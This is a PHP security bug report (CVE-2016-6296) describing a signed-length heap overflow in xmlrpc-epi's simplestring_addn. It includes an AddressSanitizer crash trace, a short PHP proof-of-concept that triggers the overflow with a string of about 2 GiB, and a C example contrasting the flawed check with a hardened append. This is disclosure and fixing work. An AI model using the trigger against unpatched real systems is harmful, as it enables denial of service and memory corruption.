PHP :: Sec Bug #72606 :: heap-buffer-overflow (write) simplestring_addn simplestring.c
| Sec Bug #72606 | heap-buffer-overflow (write) simplestring_addn simplestring.c | | |
|---|---|---|---|
| Submitted: | 2016-07-17 09:08 UTC | Modified: | 2016-07-25 15:21 UTC |
| From: | pranjal dot jumde at gmail dot com | Assigned: | stas (profile) |
| Status: | Closed | Package: | XMLRPC-EPI related |
| PHP Version: | 5.5.37 | OS: | All |
| Private report: | No | CVE-ID: | 2016-6296 |
[2016-07-17 09:08 UTC] pranjal dot jumde at gmail dot com
Description:
------------
String length checks in simplestring_addn in simplestring.c use length as signed integers. This can be used by a malicious php script to cause out of bounds write on the heap.

Tested on: git source https://github.com/php/php-src.git. Commit version: 735bec4f4018a4009a37d96489afe941c1ad711a compiled with address sanitizer.

Repro steps: Run the attached php script with xmlrpc enabled version of php.

```
$php poc.php
=================================================================
==57127==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000bac0 at pc 0x00010a958bfe bp 0x7fff56c74b50 sp 0x7fff56c74310
WRITE of size 2147483581 at 0x60c00000bac0 thread T0
    #0 0x10a958bfd in __asan_memcpy (libclang_rt.asan_osx_dynamic.dylib+0x41bfd)
    #1 0x10995aeb5 in simplestring_addn simplestring.c:212
    #2 0x10996293d in simplestring_out_fptr xml_element.c:513
    #3 0x109962580 in xml_element_serialize xml_element.c:281
    #4 0x109962025 in xml_element_serialize xml_element.c:482
    #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542
    #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714
    #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700
    #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675
    #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432
    #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474
    #11 0x109b1c4ab in zend_execute_scripts zend.c:1447
    #12 0x1099b241e in php_execute_script main.c:2533
    #13 0x109dee25d in do_cli php_cli.c:990
    #14 0x109dec029 in main php_cli.c:1378
    #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284)
    #16 0x1 (<unknown module>)

0x60c00000bac0 is located 0 bytes to the right of 128-byte region [0x60c00000ba40,0x60c00000bac0)
allocated by thread T0 here:
    #0 0x10a961e07 in wrap_realloc (libclang_rt.asan_osx_dynamic.dylib+0x4ae07)
    #1 0x10995ae30 in simplestring_addn simplestring.c:205
    #2 0x10996293d in simplestring_out_fptr xml_element.c:513
    #3 0x109961b8d in xml_element_serialize xml_element.c:281
    #4 0x109962025 in xml_element_serialize xml_element.c:482
    #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542
    #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714
    #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700
    #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675
    #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432
    #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474
    #11 0x109b1c4ab in zend_execute_scripts zend.c:1447
    #12 0x1099b241e in php_execute_script main.c:2533
    #13 0x109dee25d in do_cli php_cli.c:990
    #14 0x109dec029 in main php_cli.c:1378
    #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284)
    #16 0x1 (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow (libclang_rt.asan_osx_dynamic.dylib+0x41bfd) in __asan_memcpy
Shadow bytes around the buggy address:
  0x1c1800001700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c1800001710: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c1800001720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c1800001730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c1800001740: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x1c1800001750: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
  0x1c1800001760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 fa
  0x1c1800001770: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x1c1800001780: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x1c1800001790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c18000017a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==57127==ABORTING
Abort trap: 6
```

Test script:
---------------
```php
<?php
// Raise the memory limit so a string of roughly 2 GiB can be built.
ini_set('memory_limit', '2148M');
$max = 2147483582;
$name = '';
// Build a method name of 2147483581 bytes, just below INT_MAX.
for ($i = 1; $i < $max; $i++) {
    $name .= 'a';
}
// Serialising the request appends $name through simplestring_addn.
$request = xmlrpc_encode_request($name, "somevalue");
?>
```

Expected result:
----------------
No crash. Patch attached.
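The bug class the report describes, as an added example in C that is not xmlrpc-epi's code and not the patch attached to this report: a "do I need to grow the buffer?" decision made on 32-bit signed lengths, beside an append routine that keeps every size in `size_t` and rejects a length that would wrap before it touches memory. The `sstr` type and the functions `signed_check_says_grow`, `sstr_addn` and `sstr_free` are constructed for this illustration and are not the simplestring.c functions; the signed arithmetic is a stand-in for the pattern, not a copy of the real code.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed growable string for this example; a stand-in with the same
 * shape as a typical "simple string", NOT xmlrpc-epi's simplestring type. */
typedef struct {
    char  *str;   /* buffer, NUL-terminated after every successful append */
    size_t len;   /* bytes in use, excluding the terminator */
    size_t size;  /* bytes allocated */
} sstr;

/* The flawed pattern from the report: the capacity decision is made on
 * 32-bit signed lengths (constructed illustration, not simplestring.c).
 * Returns 1 if this check would grow the buffer, 0 if it would proceed
 * straight to memcpy with the current allocation. */
int signed_check_says_grow(int32_t len, int32_t size, int32_t n)
{
    /* Sum in uint32_t and convert back so the wrap is defined on
     * two's-complement targets instead of signed-overflow UB; the value is
     * what a plain `len + n` on int yields in practice. */
    int32_t needed = (int32_t)((uint32_t)len + (uint32_t)n);
    /* Once `needed` has wrapped negative it can never exceed `size`, so the
     * buffer is not grown and a following memcpy of n bytes overflows it. */
    return needed > size;
}

/* Hardened append: all sizes are size_t, the addition is checked for wrap
 * before it is performed, and capacity doubling is capped so it cannot wrap
 * either. Returns 0 on success, -1 on overflow or allocation failure; on -1
 * the string is left unchanged. */
int sstr_addn(sstr *s, const char *src, size_t n)
{
    /* Reject n if len + n + 1 (terminator) would not fit in size_t. */
    if (n > SIZE_MAX - s->len - 1)
        return -1;
    size_t needed = s->len + n + 1;

    if (needed > s->size) {
        size_t newsize = s->size ? s->size : 64;
        while (newsize < needed) {
            if (newsize > SIZE_MAX / 2) { newsize = needed; break; }
            newsize *= 2;
        }
        char *p = realloc(s->str, newsize);
        if (p == NULL)
            return -1;
        s->str  = p;
        s->size = newsize;
    }
    memcpy(s->str + s->len, src, n);
    s->len += n;
    s->str[s->len] = '\0';
    return 0;
}

void sstr_free(sstr *s)
{
    free(s->str);
    s->str = NULL;
    s->len = s->size = 0;
}

int main(void)
{
    /* A length near INT32_MAX, like the ~2 GiB method name in the report. */
    int32_t big = INT32_MAX - 10;
    printf("signed check, n=100:          grow=%d\n",
           signed_check_says_grow(64, 128, 100));
    printf("signed check, n=INT32_MAX-10: grow=%d (growth missed)\n",
           signed_check_says_grow(64, 128, big));

    sstr s = {0};
    sstr_addn(&s, "hello", 5);
    sstr_addn(&s, " world", 6);
    printf("hardened append: \"%s\" (len=%zu size=%zu)\n", s.str, s.len, s.size);
    printf("hardened append of SIZE_MAX-2 bytes: rc=%d (rejected)\n",
           sstr_addn(&s, "x", SIZE_MAX - 2));
    sstr_free(&s);
    return 0;
}
```

The point of the hardened version is the order of operations: the wrap check happens on the operands, before `len + n` is computed, and the function fails closed rather than falling through to `memcpy`. Testing builds of a native extension with AddressSanitizer, as the reporter did, is what turns a silently wrapped check into the immediate `heap-buffer-overflow` report shown above.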
History
[2016-07-17 20:27 UTC] stas@php.net
-Package: Reproducible crash +Package: XMLRPC-EPI related
[2016-07-17 23:49 UTC] stas@php.net
[2016-07-18 00:04 UTC] stas@php.net
[2016-07-18 00:16 UTC] pranjal dot jumde at gmail dot com
[2016-07-18 00:46 UTC] stas@php.net
[2016-07-18 18:03 UTC] pranjal dot jumde at gmail dot com
[2016-07-19 04:45 UTC] stas@php.net
-Assigned To: +Assigned To: stas
[2016-07-19 04:46 UTC] stas@php.net
-PHP Version: 7.1.0alpha3 +PHP Version: 5.5.37
[2016-07-19 06:33 UTC] pranjal dot jumde at gmail dot com
[2016-07-19 07:47 UTC] stas@php.net
-Status: Assigned +Status: Closed
[2016-07-19 15:56 UTC] pranjal dot jumde at gmail dot com
[2016-07-25 15:21 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2016-6296
[2016-10-20 03:44 UTC] nguyenluan dot vnn at gmail dot com